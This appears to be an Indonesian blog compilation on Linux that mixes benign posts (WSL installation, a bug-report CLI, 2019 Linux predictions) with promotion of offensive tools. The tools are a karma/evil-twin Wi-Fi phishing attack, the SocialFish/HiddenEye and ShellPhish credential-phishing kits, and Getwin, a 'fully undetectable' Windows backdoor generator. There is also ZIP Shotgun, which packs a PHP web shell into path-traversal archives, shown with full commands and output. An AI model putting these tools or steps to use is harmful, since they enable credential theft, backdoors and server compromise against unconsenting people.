Maxteroit: Linux
SKA: Simple Karma Attack

Pengetahuan tentang karma attack tidak diketahui publik sebelum 2004. Pada tahun ini dua teknolog terkenal, Dino dai Zovi dan Shaun Macaulay, mengumumkannya ke publik. SKA adalah alat yang dapat memberi Anda kesempatan untuk menerapkan karma attack yang sangat sederhana dan cepat.

Karma Attack ini cenderung menemukan jalannya ke perangkat pengguna dengan memanfaatkan celah konektivitas Wi-Fi. Serangan itu merupakan varian dari proses evil-twin.

Evil Twin Attack: “evil twin adalah titik akses Wi-Fi palsu yang tampaknya sah tetapi dibuat untuk menguping komunikasi nirkabel. Evil Twin adalah LAN nirkabel yang setara dengan penipuan phishing. "(Sumber: Wikipedia)"

Jenis serangan yang sangat berguna untuk mencuri kata sandi menggunakan metode phishing yang sudah dikenal.
Karma Attack: “Jenis serangan yang mengeksploitasi perilaku beberapa perangkat Wi-Fi, dikombinasikan dengan kurangnya otentikasi titik akses di banyak protokol WiFi. Ini adalah varian dari serangan kembar jahat. ”(Sumber: Wikipedia)"

SKA: MiTM Attack pada Kerentanan Wi-Fi Perangkat

Karma Attack yang berhasil dieksekusi, menciptakan AP yang dapat digunakan untuk memulai dan mengeksekusi serangan perangkat lain yang diinginkan. AP ini mengambil posisi platform perantara yang akan menyerang perangkat apa pun dengan kerentanan Wi-Fi mis. Sistem otentikasi yang kurang waspada saat menghubungkan kembali ke jaringan lama.

Perangkat yang menyiarkan nomor identifikasi SS untuk koneksi mereka sebelumnya berisiko dari serangan itu. Ini karena siaran tidak dilindungi karena perangkat siap untuk menyambung kembali tanpa perlu otentikasi. Oleh karena itu serangan mengambil keuntungan dari kurangnya enkripsi dan karenanya menyamar sebagai salah satu koneksi sebelumnya untuk mendapatkan akses ke perangkat.

Bagaimana itu bekerja?

  1. Memilih NIC.
  2. Menangkap permintaan probe dan memilih nama AP palsu.
  3. Mengaktifkan AP palsu.
  4. AP baru berisi server DHCP yang memberikan IP yang benar kepada pengguna yang ditargetkan dan tidak mengizinkan peringatan apa pun ditampilkan di perangkat korban.
  5. Mengaktifkan pengalihan HTTP.
  6. Permintaan HTTP sedang dialihkan ke situs palsu sementara lalu lintas melalui HTTPS biasanya berlanjut.
  7. Mengaktifkan server Apache yang akan meng-host situs phishing.
  8. Di akhir serangan, skrip akan dibersihkan dan konfigurasi Apache akan dipulihkan.

Platform yang didukung:

Sistem operasi yang mirip dengan sistem UNIX rentan. Ini termasuk:
  • Windows,
  • Linux,
  • OS X,
  • Android,
  • IOS, meskipun ada pembaruan terbaru.

Modul:

  • NICs
  • Sniff Probe
  • Fake AP
  • HTTP
  • DHCP
  • download
  • Apache

Instal [Potensi Masalah]

SKA akan memperingatkan Anda jika ada beberapa masalah dengan file konfigurasi NetworkManager demon atau Apache. (Info lebih lanjut di sini).

DNS line harus dinonaktifkan. Ini dapat ditemukan di configfile dari Network manager (/etc/NetworkManager/):
$ dns=dnsmasq
Identifikasi alamat MAC adaptor nirkabel, lalu konfigurasikan sebagai berikut:
$ unmanaged-devices=mac:XX:XX:XX:XX:XX:XX

Download

SKA: Simple Karma Attack

SocialFish V3 The Ultimate Phishing Tool - Educational Phishing Tool & Information Collector

SocialFish V3 The Ultimate Phishing Tool

Setting Up SocialFish

Prerequisites 
  • Python 3.6 or >
  • pip3
Python 3 Prerequisites
  • flask
  • colorama
  • sqlite3
  • flask_login
  • shutil
  • re
  • os
  • secrets
  • python-nmap
  • smtplib
  • email
  • pylatex
  • qrcode

RUNNING (In Linux)

cd HiddenEye
sudo apt install python3-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
python3 HiddenEye.py
OR
./HiddenEye.py

RUNNING (If distro based on Arch Linux)

cd HiddenEye
sudo pacman -Syu
sudo pacman -S python-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
python3 HiddenEye.py
OR
./HiddenEye.py

RUNNING (For Android users in Termux)

First install { Termux } from Playstore. After opening Follow below commands One by one
pkg install git python php curl openssh grep
pip3 install wget
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
cd HiddenEye
chmod 777 HiddenEye.py
python HiddenEye.py
or
./HiddenEye.py

SocialFish V3 The Ultimate Phishing Tool


Getwin adalah sebual tools untuk membuat backdoor yang dijalankan pada Linux. berikut selengkapnya tentang Getwin - FUD Win32 Payload Generator Dan Listener.

Legal disclaimer:

Penggunaan GetWin untuk menyerang target tanpa persetujuan bersama sebelumnya adalah ilegal. Merupakan tanggung jawab pengguna akhir untuk mematuhi semua hukum setempat, negara bagian, dan federal. Pengembang tidak bertanggung jawab dan tidak bertanggung jawab atas penyalahgunaan atau kerusakan yang disebabkan oleh program ini.

Fitur Getwin

  • FUD: Fully Undetectable (Sepenuhnya Tidak Terdeteksi)
  • Tidak Perlu mengkonfigurasi penerusan port, atau menginstal program lain, hanya menggunakan ssh dan serveo.net.

Penggunaan

git clone https://github.com/thelinuxchoice/getwin
cd getwin
bash getwin.sh

Install Requirements (mingw-w64):

sudo apt-get install mingw-w64

Getwin - FUD Win32 Payload Generator Dan Listener

Linux pada Windows adalah kenyataan, berkat kemitraan antara Canonical (perusahaan induk Ubuntu) dan Microsoft. Ketika CEO Microsoft mengumumkan bahwa Bash shell akan datang ke Windows, sejumlah orang tidak percaya. #BashOnWindows cenderung di Twitter selama berhari-hari, seperti itulah dampak dari berita ini.

Linux di Windows 10


Tapi Bash pada Windows tidak tersedia untuk semua orang dengan segera. Orang-orang harus menginstal Windows 10 technical preview untuk menginstal Linux pada Windows 10. Tetapi ini bukan masalahnya lagi. Upgrade Windows 10 anniversary ada di sini dan sekarang Anda dapat dengan mudah mendapatkan bash di Windows. Tapi sebelum kita menginstal bash di Windows, izinkan saya memberi tahu Anda lebih banyak tentangnya.


Apa itu Bash di Windows?

Bash pada Windows menyediakan subsistem Windows dan Ubuntu Linux berjalan di atasnya. Ini bukan mesin virtual atau aplikasi seperti Cygwin. Ini adalah sistem Linux yang lengkap di dalam Windows 10.

Pada dasarnya, ini memungkinkan Anda untuk menjalankan Bash shell yang sama yang Anda temukan di Linux. Dengan cara ini Anda dapat menjalankan perintah Linux di dalam Windows tanpa perlu menginstal mesin virtual atau dual boot Linux dan Windows. Anda menginstal Linux di dalam Windows seperti aplikasi biasa. Ini adalah opsi yang baik jika tujuan utama Anda adalah mempelajari perintah Linux / Unix.

Saya sarankan membaca artikel ini untuk mengetahui lebih banyak tentang Bash di Windows.


Metode 1: Instal Linux Bash Shell di Windows 10 Fall's Creator Update

Hal baiknya adalah bahwa Fall's Creator Update membuatnya lebih mudah untuk menginstal Bash di Windows 10. Anda bisa mendapatkannya dalam satu klik dari Windows Store. Masih ada beberapa hal yang harus dilakukan.

Saya menginstal Ubuntu menggunakan subsistem Windows 10 Linux. Anda juga dapat menggunakan SUSE Linux. Prosedurnya sama untuk kedua distribusi.

Langkah 1: Aktifkan fitur "Windows Subsystem untuk Linux"

Hal pertama yang perlu Anda lakukan adalah mengaktifkan fitur Windows Subsyetm untuk Linux dari PowerShell.

Buka menu Start dan cari PowerShell. Jalankan sebagai administrator:

Powershell Ubuntu 1

Setelah menjalankan PowerShell, gunakan perintah di bawah ini untuk mengaktifkan Bash di Windows 10.

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

Anda akan diminta untuk mengonfirmasi pilihan Anda. Gunakan Y atau tekan enter:

Powershell Ubuntu 2

Sekarang Anda harus diminta untuk reboot. Bahkan jika Anda tidak diminta, Anda harus reboot sistem Anda.


Langkah 2: Unduh sistem Linux dari Windows store

Setelah sistem Anda reboot, buka Windows Store dan cari Linux.

Install Ubuntu Windows 10 Linux Subsytem

Anda akan melihat opsi untuk menginstal Ubuntu atau SUSE. Saya telah menginstal Ubuntu untuk Bash di Windows di sini.


Apa perbedaan antara menggunakan Ubuntu atau openSUSE atau SUSE Linux Enterprises? Dan yang mana yang harus Anda gunakan?

Jika itu pertanyaan Anda, mungkin Anda tidak tahu banyak tentang distribusi Linux. Untuk memberi tahu Anda dengan cepat, perbedaan utama adalah pada perintah untuk menginstal paket baru di dalam subsistem Linux ini. Saya sarankan pergi untuk Ubuntu dalam hal ini.

Setelah Anda memilih distribusi pilihan Anda, Anda akan melihat opsi untuk menginstalnya. Perhatikan bahwa ini akan mengunduh file berukuran sekitar 1Gb. Jadi, Anda harus memiliki koneksi internet yang baik di sini.


Langkah 3: Jalankan Linux di dalam Windows 10

Anda hampir sampai. Setelah Anda menginstal, sekarang saatnya untuk melihat cara mengakses Bash di Windows 10.

Hanya mencari distribusi Linux yang Anda instal pada langkah sebelumnya. Dalam kasus saya itu adalah Ubuntu. Anda akan melihat bahwa itu berjalan seperti aplikasi Windows normal.

Diperlukan waktu untuk menginstal dan Anda harus menyiapkan nama pengguna dan kata sandi.


Jangan khawatir, ini hanya untuk lari pertama. Bash shell akan tersedia untuk digunakan langsung dari waktu berikutnya dan seterusnya.

Nikmati Linux di dalam Windows 10.

Cara Install Linux Bash Shell di Windows 10

ShellPish V1.7 -  Tool Phising 18 Media Sosial

ShellPish adalah tools untuk phising Yang bisa kamu jalankan di termux, atau linux. Tersedia 18 media sosial didalamnya, diantaranya : Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest.

Langsung saja ke tahap penginstallan ShellPish.

Install ShellPish

git clone https://github.com/thelinuxchoice/shellphish
cd shellphish
bash shellphish.sh

Untuk port forwarding kamu bisa menggunakan serveo atau Ngrok.

Legal Disclaimer:

Penggunaan Shellphish untuk menyerang target tanpa persetujuan bersama sebelumnya adalah ilegal. Merupakan tanggung jawab pengguna akhir untuk mematuhi semua hukum setempat, negara bagian, dan federal. Pengembang tidak bertanggung jawab dan tidak bertanggung jawab atas penyalahgunaan atau kerusakan yang disebabkan oleh program ini.

ShellPish V1.7 - Tool Phising 18 Media Sosial

Bugreport - Tools Untuk Report Bug

Melaporkan sebuah bug atau celah keamaan adalah hal yang biasa dilakukan oleh para BugHunter/Pentester. Dengan melaporkan sebuah bug yang ada biasanya mereka para BugHunter di hadiahi sebuah reward yang beragam,  dari mulai dari sejumlah uang,piagam, sertifikat, merchandise dll.

Tools yang bernama Bugreport ini adalah sebuah tools untuk melaporkan bug kepada email dev/admin website melalui email, jadi bukan sebuah tools untuk pentest ya. Biasanya mereka melaporkan sebuah bug melalui aplikasi emailnya langsung dengan tools ini kamu bisa melaporkannya melalui email tapi via CLI yang dijlankan di terminal Linux kamu.

Instalasi Bugreport di Termux

$ pkg install python
$ git clone https://github.com/marioyhzkiell/bugreport.git
$ cd bugreport
$ chmod 777 bugreport.py


Menjalankan Bugreport

Untuk menjalakannya masukan perintah berikut:
$ python bugreport.py

Akhir kata

Semoga artikel kali ini bermanfaat buat kamu para pembaca setia Maxteroit ya. nantikan artikel menarik lainnya di Maxteroit.

Bugreport - Tools Untuk Report Bug

5 Hal Penting yang Harus Diperhatikan di Linux pada 2019

Keadaan Linux telah menjadi jauh lebih baik selama beberapa tahun terakhir di dalam dan luar negeri. Saya telah mengajak beberapa anggota Maxteroit yang biasanya hanya menggunakan Windows untuk belajar Linux, dan umpan baliknya positif. Ini gratis, mudah digunakan.

Ada sisi lain saya yang tahu bahwa Linux tidak akan pernah mendapatkan pangsa pasar yang besar atau kesadaran di arena PC desktop. Juga tidak akan mendominasi pasar bisnis di luar server. Ini sebenarnya bagus dan mengerikan. Semakin tidak mainstream, semakin tidak menarik bagi pelaku jahat untuk menyerang.

Linux juga menikmati status relatif tidak dikenal karena digunakan pada banyak perangkat di latar belakang. Android adalah contoh utama: meskipun Java, inti didasarkan dari kernel Linux. Banyak perangkat IoT menjalankan Linux. Amazon, Google dan Facebook semuanya menggunakan Linux.

Dengan itu, mari kita jelajahi apa yang akan dilakukan Linux pada tahun 2019.

1. Ubuntu Akan menjadi King of the Distro

1. Ubuntu Akan menjadi King of the Distro

Saya benar-benar percaya bahwa rilis Ubuntu 19.04 dan 19.10 akan menghancurkan banyak regresi dari 18.04 dan memberikan sedikit polesan untuk memenangkan kembali pengguna. Umpan balik awal dari rilis Alpha dan Beta menunjukkan bahwa dimasukkannya GSConnect, integrasi Snap yang lebih baik dan potensi pengguna baru (mungkin pada 20,04).

2. Linux 5.0 Kernel

Jadi ini kurang prediksi, lebih banyak berita lama. Kita tahu bahwa iterasi kernel berikutnya akan dirilis pada 2019. Pada saat penulisan, rilis ini adalah 5.0-rc4. Perubahannya tidak inovatif, seperti kata-kata Linux sendiri, tetapi kita dapat mengharapkan lebih banyak dukungan perangkat keras seperti perangkat ARM, kode yang disederhanakan (walaupun ukurannya masih relatif sama) dan peningkatan kinerja yang tak terhindarkan. Mengingat ini adalah inti dari Linux, setiap pembaruan adalah perkembangan yang cukup besar.

3. Linux A.I. dan Data Lakes


Kita telah melihat munculnya "Data Leakes" - kumpulan besar data dalam format lossless yang tidak terstruktur - sebagai akibat dari peningkatan jumlah data yang dihasilkan dan dikonsumsi. Perusahaan dan organisasi besar akan memanfaatkan ini sebelum Linux digunakan untuk menyediakan beberapa pesanan.

Hal yang sama dapat dikatakan untuk A.I. Sierra. Superkomputer tercepat kedua di dunia akan digunakan untuk persenjataan nuklir A.S., dan ini menjalankan RHEL (Red Hat Enterprise Linux). Tidaklah sulit untuk menganggap bahwa dengan kehadiran Linux yang kuat dalam superkomputer, lebih banyak agen akan membutuhkan daya dan keandalan asli ini seiring dengan meningkatnya aplikasi dan perangkat keras.

Saya benar-benar ingin melihat superkomputer Linux digunakan untuk perawatan kesehatan yang lebih baik, mengumpulkan data untuk krisis iklim dan menemukan cara untuk menyatukan umat manusia. Fakta bahwa sebagian besar menggunakan kekuatan ini untuk melayani iklan dan melakukan pengawasan massal terhadap orang-orang adalah pandangan pendek.

Mari kita berharap tahun 2019 adalah tahun perubahan menjadi lebih baik.

4. Blockchain


Blockchain sudah merupakan pengembangan besar dengan perusahaan yang menggunakannya untuk penelitian, keuangan, dan sejenisnya. Saya berharap untuk melihat Distro Linux yang sudah jadi yang berbasis Blockchain. Saat memasang Etherium, Hyperledger Fabric (ini adalah mesin virtual yang memfasilitasi jaringan dan juga memverifikasi izin transaksi) untuk mengakses dan menggunakan Blockchain, memakan waktu. Mengingat perkembangan teknologi, belum semua orang memahami penggunaan dan kebutuhan. Jika ini ditempatkan dalam putaran Server Ubuntu, penggunaan Blockchain dapat meningkat secara eksponensial.

5. Proton dan Steam

Saya malu mengakui bahwa saya baru-baru ini menemukan Steam telah melakukan pekerjaan besar dalam kompatibilitas Linux untuk game dengan Proton. Ini berarti bahwa saya hampir tidak masuk ke partisi Windows saya sekarang, karena semua game di Steam Library saya berjalan setidaknya untuk standar Gold.

Steam juga baru-baru ini mengumumkan bahwa permainan di luar Steam Store sekarang akan tersedia. Barang-barang yang dibeli dari GOG, misalnya, akan dapat dieksekusi di Steam untuk Linux seolah-olah itu asli (kecuali masalah-masalah besar yang harus diselesaikan.)

Pekerjaan dan komitmen yang ditunjukkan Valve tidak diragukan lagi akan terus berlanjut. Hampir 50% game sekarang menjalankan Gold to Platinum. Ini bukan lompatan besar untuk menyarankan bahwa persentase yang lebih kecil dari game Silver and Bronze dan Borked akan menyusut karena lebih banyak pengguna yang ikut serta berkontribusi dalam laporan bug.

Sebagai prediksi untuk 2019, saya memperkirakan standar Gold mendorong kompatibilitas lebih dari 75%. Untungnya, Valve memiliki kekuatan pemasaran untuk membawa game Linux ke arus utama, yang setidaknya akan meningkatkan kesadaran OS bahkan jika adopsi lebih lambat.

Apa pun yang dibawa tahun 2019, silakan tinggalkan komentar dan saran Anda di bawah ini. Kita semua akan memiliki opsi yang berbeda, dan itulah yang membuat komunitas ini luar biasa. Namun, mengingat potensi perang api yang dapat meletus dengan jenis kepingan ini, ingatlah bahwa ini hanyalah prediksi yang longgar.

5 Hal Penting yang Harus Diperhatikan di Linux pada 2019


Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post on Silent Signal Techblog - Compressed File Upload And Command Execution and from OWASP - Test Upload of Malicious Files
This script will create archive which contains files with "../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.
Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HERE

Installation
  1. Install using Python pip
    pip install zip-shotgun --upgrade
  2. Clone git repository and install
    git clone https://github.com/jpiechowka/zip-shotgun.git
    Execute from root directory of the cloned repository (where setup.py file is located)
    pip install . --upgrade

Usage and options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
  --version                       Show the version and exit.
  -c, --directories-count INTEGER
                                  Count of how many directories to go back
                                  inside the zip file (e.g 3 means that 3
                                  files will be added to the zip: shell.php,
                                  ../shell.php and ../../shell.php where
                                  shell.php is the name of the shell you
                                  provided or randomly generated value
                                  [default: 16]
  -n, --shell-name TEXT           Name of the shell inside the generated zip
                                  file (e.g shell). If not provided it will be
                                  randomly generated. Cannot have whitespaces
  -f, --shell-file-path PATH      A file that contains code for the shell. If
                                  this option is not provided wwwolf
                                  (https://github.com/WhiteWinterWolf/wwwolf-
                                  php-webshell) php shell will be added
                                  instead. If name is provided it will be
                                  added to the zip with the provided name or
                                  if not provided the name will be randomly
                                  generated.
  --compress                      Enable compression. If this flag is set
                                  archive will be compressed using DEFALTE
                                  algorithm with compression level of 9. By
                                  default there is no compression applied.
  -h, --help                      Show this message and exit.

Examples
  1. Using all default options
    zip-shotgun archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
  2. Using default options and enabling compression for archive file
    zip-shotgun --compress archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
  3. Using default options but changing the number of directories to go back in the archive to 3
    zip-shotgun --directories-count 3 archive.zip
    zip-shotgun -c 3 archive.zip
    The script will write 3 files in total to the archive
    Part of the script output
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
  4. Using default options but providing shell name inside archive and enabling compression
    Shell name cannot have whitespaces
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
    Name for shell files inside the archive will be set to the one provided by the user.
    Part of the script output
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:19:12 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../../custom-name.php
    ...
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL
  5. Provide custom shell file but use random name inside archive. Set directories count to 3
    zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c 3 -f ./custom-shell.php archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
    Part of the script output
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:21:37 +0100 |  WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
  6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
    zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
    Part of the script output
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL


ZIP Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

Subscribe Our Newsletter